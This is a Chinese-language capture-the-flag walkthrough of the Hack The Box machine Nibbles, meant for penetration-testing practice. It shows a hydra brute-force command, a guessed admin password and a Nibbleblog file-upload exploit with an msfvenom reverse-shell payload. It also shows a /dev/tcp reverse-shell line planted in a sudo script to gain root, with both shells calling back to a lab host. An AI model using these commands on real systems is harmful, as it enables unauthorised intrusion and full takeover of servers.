乐趣区

关于渗透测试:HTBNibbles文件配置错误

免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。

服务发现

┌──(root💀kali)-[~/htb/Nibbles]
└─# nmap -sC -sV 10.10.10.75    
Starting Nmap 7.91 (https://nmap.org) at 2021-12-11 03:53 EST
Nmap scan report for 10.10.10.75
Host is up (0.26s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.67 seconds

目录爆破

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.75 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.75/_21-12-11_03-56-40.txt

Error Log: /root/dirsearch/logs/errors-21-12-11_03-56-40.log

Target: http://10.10.10.75/

[03:56:41] Starting:    
[03:57:40] 200 -   93B  - /index.html                                          

只有一个 index 页面,关上页面显示

Hello world!

查看网页源代码,有一行正文

/nibbleblog/ directory. Nothing interesting here!

关上 /nibbleblog/ 显示一个博客

python3 dirsearch.py -e* -t 100 -u http://10.10.10.75/nibbleblog

再次爆破这个博客的目录

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.75/nibbleblog

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                                                                                                                             
 (_||| _) (/_(_|| (_|)                                                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                                                             
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.75/-nibbleblog_21-12-11_04-05-45.txt

Error Log: /root/dirsearch/logs/errors-21-12-11_04-05-45.log

Target: http://10.10.10.75/nibbleblog/

[04:05:46] Starting:                              
[04:06:06] 200 -    1KB - /nibbleblog/COPYRIGHT.txt                         
[04:06:08] 200 -    5KB - /nibbleblog/README                                
[04:06:10] 200 -   34KB - /nibbleblog/LICENSE.txt                           
[04:06:11] 301 -  321B  - /nibbleblog/admin  ->  http://10.10.10.75/nibbleblog/admin/
[04:06:12] 200 -    1KB - /nibbleblog/admin.php                             
[04:06:12] 403 -  312B  - /nibbleblog/admin/.htaccess                       
[04:06:12] 200 -    2KB - /nibbleblog/admin/                                
[04:06:12] 200 -    2KB - /nibbleblog/admin/?/login                         
[04:06:13] 200 -    2KB - /nibbleblog/admin/js/tinymce/                     
[04:06:13] 301 -  332B  - /nibbleblog/admin/js/tinymce  ->  http://10.10.10.75/nibbleblog/admin/js/tinymce/
[04:06:29] 400 -  303B  - /nibbleblog/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[04:06:33] 200 -    1KB - /nibbleblog/content/                              
[04:06:33] 301 -  323B  - /nibbleblog/content  ->  http://10.10.10.75/nibbleblog/content/
[04:06:44] 200 -    3KB - /nibbleblog/index.php                             
[04:06:44] 200 -    3KB - /nibbleblog/index.php/login/                      
[04:06:44] 200 -   78B  - /nibbleblog/install.php                           
[04:06:46] 301 -  325B  - /nibbleblog/languages  ->  http://10.10.10.75/nibbleblog/languages/
[04:07:01] 301 -  323B  - /nibbleblog/plugins  ->  http://10.10.10.75/nibbleblog/plugins/
[04:07:02] 200 -    4KB - /nibbleblog/plugins/                              
[04:07:17] 200 -    2KB - /nibbleblog/themes/                               
[04:07:17] 301 -  322B  - /nibbleblog/themes  ->  http://10.10.10.75/nibbleblog/themes/
[04:07:18] 200 -    2KB - /nibbleblog/update.php    

这次信息挺丰盛,一个个剖析

README 文件暴露出 cms 版本

====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

admin 模块看名字应该是治理登录页面,然而配置谬误,当初能够遍历目录里的所有文件,外面各种 .bit 文件查看网页源代码时甚至能够看到 php 源代码
admin.php 是登录页面
content 模块也有文件遍历,user.xml 文件暴露出一个用户名admin, 然而找不到明码

如果尝试用上面的命令爆破

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form “/nibbleblog/admin.php:username=^USER^&password=^PASS^&login=Login:Incorrect username or password.”

会触发一个 web 爱护

Nibbleblog security error – Blacklist protection

下面这条爱护规定在/nibbleblog/admin/boot/rules/4-blacklist.bit

if($_DB_USERS->blacklist())
    exit('Nibbleblog security error - Blacklist protection');

所以如同不能爆破。

找到一个 config 文件/nibbleblog/content/private/config.xml

然而没有暴露出明码,然而有一个 email:admin@nibbles.com

咱们猜想是登录的账号是 admin,而后应用公司名 nibbles 登录,发现这个正是明码

取得 cms 登录凭证:admin:nibbles

当初咱们有了 cms 的名字,版本号,曾经登录账号,kali 搜寻这个 cms 的利用 exp

┌──(root💀kali)-[~/htb/Nibbles]
└─# searchsploit nibbleblog 4.0.3                                                                                                                                                                                                                                                                                      130 ⨯
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                                                                                                             |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                                                                                                                                                                                                                      | php/remote/38489.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

初始 shell

这个 payload 要应用 Metasploit,然而我不想应用这个工具。依据破绽编号,我在 github 上找到了这个 python 版本的 exp

依照阐明

  1. 先编译一个 payload, 保留在 nibble.txt

msfvenom -p php/reverse_perl –format raw -o nibble.txt LHOST=10.10.14.3 LPORT=4444

  1. 批改 exp 外面的这几行代码,保留

    nibbleUsername = "admin"
    nibblePassword = "nibbles"
    
    nibbleURL = "http://10.10.10.75/nibbleblog/"
    
  2. 开启监听

    nc -lnvp 4444

  3. 执行攻打

    ┌──(root💀kali)-[~/htb/Nibbles]
    └─# python exp.py                                                                                                                                                                                                                                         
    [-] LOGIN RESPONSE: 200 OK
    [+] Login Successful.
    [-] Upload likely successful.
    [-] UPLOAD RESPONSE: 200 OK
    [+] Exploit launched, check for shell.
    [-] EXPLOIT RESPONSE: 200 OK
    
  4. 收到反弹 shell

    ┌──(root💀kali)-[~/htb/Nibbles]
    └─# nc -lnvp 4444                  
    listening on [any] 4444 ...
    connect to [10.10.14.3] from (UNKNOWN) [10.10.10.75] 37284
    id
    uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
    whoami
    nibbler
    

提权

查看 sudo 特权

nibbler@Nibbles:/home$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

能够执行一个叫 monitor.sh 的文件

然而这个文件在零碎中是不存在的

nibbler@Nibbles:/home$ cat /home/nibbler/personal/stuff/monitor.sh
cat /home/nibbler/personal/stuff/monitor.sh
cat: /home/nibbler/personal/stuff/monitor.sh: No such file or directory

所以思路很简略,咱们创立这个文件,而后反弹一个 root shell

  1. 筹备 monitor.sh 的内容为:

    #!/bin/bash
    0<&196;exec 196<>/dev/tcp/10.10.14.3/4242; sh <&196 >&196 2>&196
    
  2. kali 开启一个新的监听

    nc -lnvp 4242

  3. sudo 执行

    nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo  /home/nibbler/personal/stuff/monitor.sh
    <er/personal/stuff$ sudo  /home/nibbler/personal/stuff/monitor.sh            
    /home/nibbler/personal/stuff/monitor.sh: line 2: 196: Bad file descriptor
  4. 收到 root 权限反弹

    ┌──(root💀kali)-[~/htb/Nibbles]
    └─# nc -lnvp 4242                                                                                                                                                                                             1 ⨯
    listening on [any] 4242 ...
    connect to [10.10.14.3] from (UNKNOWN) [10.10.10.75] 43962
    id
    uid=0(root) gid=0(root) groups=0(root)
    whoami        
    root
    
退出移动版